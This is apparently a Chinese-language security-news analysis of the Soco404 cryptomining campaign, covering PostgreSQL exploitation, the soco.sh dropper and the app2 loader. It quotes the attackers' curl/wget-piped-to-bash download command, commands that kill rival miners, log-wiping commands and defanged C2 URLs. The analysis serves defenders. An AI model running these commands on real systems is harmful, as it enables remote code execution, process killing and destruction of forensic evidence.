摘要

本報告詳細介紹了 Soco404 多平台加密貨幣挖礦攻擊的技術面向,這是一個積極利用雲端環境中各種漏洞和錯誤設定的活躍威脅。此攻擊針對 Linux 和 Windows 系統,部署特定平台的惡意軟體,並採用包括 process masquerading 和 log eradication 在內的複雜規避技術。Soco404 的一個關鍵特徵是依賴被入侵的合法伺服器來托管和傳遞 malicious payloads,通常嵌入在假的 404 HTML 頁面中。本分析深入探討了漏洞攻擊方法、 soco.sh dropper 腳本的功能,以及主要 app2 payload 的執行流程,突顯了此加密貨幣挖礦攻擊的技術巧妙性和持續性。

Soco404多平台攻擊:惡意腳本與雲端漏洞解析 | 資訊安全新聞

1. 簡介

網路威脅的格局不斷演變,加密貨幣挖礦攻擊成為對組織和個人構成重大風險的顯著問題。這些攻擊非法利用計算資源進行加密貨幣生成,導致系統性能下降、運營成本增加以及敏感資料可能被洩露。Soco404 攻擊代表了此類威脅的複雜迭代,以其多平台目標能力和先進的隱形機制而著稱。本研究旨在提供 Soco404 攻擊的全面技術概述,剖析其攻擊向量、payload 傳遞機制和後續利用攻擊。通過檢查技術細節,包括特定程式碼片段和執行流程,本報告旨在增進對此持續威脅的理解,並促進更有效的防禦策略。

2. 技術分析

2.1 PostgreSQL 漏洞攻擊

Soco404 攻擊明確專注於利用設定錯誤或有漏洞的 PostgreSQL 實例。Threat actors 積極掃描允許未經認證或低門檻進入的存取服務 [1] 。由於 PostgreSQL 的廣泛使用和常見預設設定,經常出現在這些攻擊流程中。在獲得初始存取後,攻擊者濫用 PostgreSQL 的 COPY ... FROM PROGRAM 功能實現遠端程式碼執行(Remote Code Execution, RCE) [1] 。此關鍵漏洞允許他們直接在被入侵的主機上取得並執行 malicious payloads [1]

Soco404 背後的攻擊者採用機會主義策略,進行自動化掃描以尋找暴露的服務,並利用任何可存取的進入點。他們的進入工具包多樣,包括 Linux 工具如 wget curl ,以及 Windows 原生工具如 certutil PowerShell [1] 。這種靈活性確保無論目標作業系統如何,攻擊者都能部署必要的工具或技術來傳遞 payload。這種廣泛的方法是自動化加密貨幣挖礦攻擊的特徵,旨在最大化覆蓋範圍和持續性。

2.2 Linux Payload

在成功利用 Linux 系統後,攻擊者在記憶體中直接執行 soco.sh 腳本,這種技術有助於避免磁碟寫入並減少 forensic artifacts [1] 。用於記憶體執行的命令如下: 

sh -c "(curl http://<compromised-service>:8080/soco.sh||wget -q -O- http://<compromised-service>:8080/soco.sh||cc http://<compromised-service>:8080/soco.sh||ww -q -O- http://<compromised-service>:8080/soco.sh)|bash"

此命令嘗試使用多種方法( curl wget cc ww )下載並執行 soco.sh ,確保對不同系統設定或網路限制的適應性。下載嘗試的輸出直接傳送到 bash 執行,進一步減少磁碟足跡。

2.2.1 soco.sh Dropper 腳本分析

soco.sh 腳本是一個複雜的 dropper,負責為主要加密貨幣挖礦 payload 準備被入侵的系統。其關鍵功能包括 payload 傳遞、規避、持續性和系統優化 [1]

1. Payload 下載與執行: 腳本的主要功能是從被入侵的 Apache Tomcat 伺服器下載並執行主要 payload app2 。腳本根據時間戳記生成隨機檔案名稱,並將 payload 放置在可寫目錄中,刻意避免使用 /tmp /sys 以增強持續性和規避。在短暫執行期間(2秒)後,二進位檔案從磁碟中刪除以最小化其存在 [1] 。托管 payload 的伺服器通常是被入侵的 Apache Tomcat 實例,可能通過弱認證或利用如 CVE-2025-24813 的漏洞存取 [1]

2. 消除競爭挖礦程式: 為了確保對系統資源的獨佔存取以進行加密貨幣挖礦, soco.sh 積極消除其他潛在挖礦程式。這包括清除 /etc/ld.so.preload 、移除可疑的 cron 作業,以及強制終止在獨立 mount namespaces 中運行的程序 [1] 。用於此目的的命令如下: 

  1. chattr -ia /etc/ld.so.preload
  2. cat /dev/null > /etc/ld.so.preload
  4. crontab -l | sed '/\.bashgo\|pastebin\|onion\|bprofr\|python\|curl\|wget\|\.sh/d' | crontab -
  6. cat /proc/mounts | awk '{print $2}' | grep -P '/proc/\d+' | grep -Po '\d+' | xargs -I % kill -9 %

前兩個命令移除屬性並清除 ld.so.preload 檔案,該檔案可能被其他惡意軟體用於持續性。 crontab 命令過濾並移除與其他加密貨幣挖礦程式或惡意腳本相關的常見模式。最後一個命令識別並終止在獨立 mount namespaces 中運行的程序,這是高級惡意軟體常用於隱藏攻擊的技術。

3. 日誌清除: 為了阻礙鑑識分析並降低可見性,腳本覆寫關鍵系統日誌,包括 mail、wtmp、secure 和 cron 日誌 [1] 。此操作使用簡單的重新導向命令執行: 

  1. echo 0>/var/spool/mail/root
  2. echo 0>/var/log/wtmp
  3. echo 0>/var/log/secure
  4. echo 0>/var/log/cron

通過將 0 (一個空字串後接換行符)寫入這些日誌檔案,腳本有效地截斷它們,抹去其執行及後續攻擊的證據。

4. 系統優化: 如果 soco.sh 腳本以 root 權限執行,它會嘗試優化系統記憶體性能並最大化 CPU 效率。雖然提供的資訊未詳細說明此優化的具體命令,但這一步驟對於確保加密貨幣挖礦程式以最佳性能運行、最大化非法收益至關重要 [1]

2.3 惡意軟體執行流程與 Payload 分析

Soco404 攻擊的核心 payload 是一個名為 app2 的二進位檔案,hash 為 14bf32e780601c6870811982648cf293 [1] 。此二進位檔案是一個 UPX 封裝的 Go 可執行檔案,進一步使用 Garble 混淆以複雜化分析和逆向工程 [1] 。其主要角色是作為最終加密貨幣挖礦 payload 的載入器。

執行時, app2 在記憶體中解封裝自身並生成多個子程序。一個重要的規避技術是 process masquerading:它以 sd-pam 名稱重新執行自身 [1] 。此策略旨在模仿 Linux 系統上負責處理 PAM(可插拔認證模組)session 的合法 systemd 使用者服務。通過採用合法系統程序的名稱,惡意軟體試圖融入正常系統攻擊,使安全工具和分析師難以檢測其惡意性質 [1]

在初始執行和 masquerading 後,惡意軟體與其 Command and Control (C2) 伺服器建立通訊,位於 https[:]//www[.]fastsoco[.]top [1] 。此 C2 伺服器負責托管最終加密貨幣挖礦 payload,從 https[:]//www[.]fastsoco[.]top/1 檢索 [1]

C2 基礎設施的一個有趣面向是其托管在 Google Sites( https[:]//sites[.]google[.]com/view/2025soco/ )上 [1] 。當通過網頁瀏覽器存取此 URL 時,顯示假的 404 錯誤頁面 [1] 。然而,實際的二進位 payload 巧妙地以 base64 編碼的 blob 形式嵌入在此假錯誤頁面的 HTML 內容中 [1] app2 惡意軟體設計為通過搜尋由特定標記 exe101 分隔的內容來提取此嵌入的 payload [1] 。這種複雜的傳遞機制,利用看似無害的網頁和嵌入的 payload,突顯了攻擊者規避傳統網路和端點檢測系統的努力,確保加密貨幣挖礦操作的成功部署。

2.4 Windows Payload

雖然提供的文章主要聚焦於 Linux payload 及其執行,但明確指出 Soco404 攻擊針對 Linux 和 Windows 系統,部署特定平台的惡意軟體 [1] 。攻擊者使用 Windows 原生工具如 certutil PowerShell 進行進入,突顯了他們適應 Windows 環境的初始存取方法的能力 [1] 。雖然參考資料未提供 Windows payload 執行流程和具體功能的詳細分析,但可以推斷 Windows 變體可能採用類似的持續性、規避和加密貨幣挖礦策略,針對 Windows 作業系統的架構和安全機制進行調整。這包括利用 Windows 特定的持續性機制(例如,登錄檔 Run key、排程任務)、程序注入,以及可能濫用合法 Windows 服務或應用程式來偽裝其攻擊。

3. 結論

Soco404 多平台加密貨幣挖礦攻擊體現了網路威脅的日益複雜化。通過利用 PostgreSQL 等廣泛使用軟體的漏洞和被入侵的合法基礎設施,攻擊者展示了高度的適應性和資源利用能力。使用記憶體執行、process masquerading 和 log eradication 顯示出規避檢測和保持系統持續性的努力。涉及嵌入在 Google Sites 等平台上假 404 HTML 頁面中的 base64 編碼二進位檔案的複雜 payload 傳遞機制,進一步突顯了此攻擊的隱形和欺騙性質。理解這些技術細節對於開發強大的防禦機制和緩解此類先進加密貨幣挖礦操作的風險至關重要。持續的警戒、主動的漏洞管理以及增強的檢測能力對於應對 Soco404 等持續且演變的威脅至關重要。

4. 參考資料

  1. Soco404: Multiplatform Cryptomining Campaign | Wiz Blog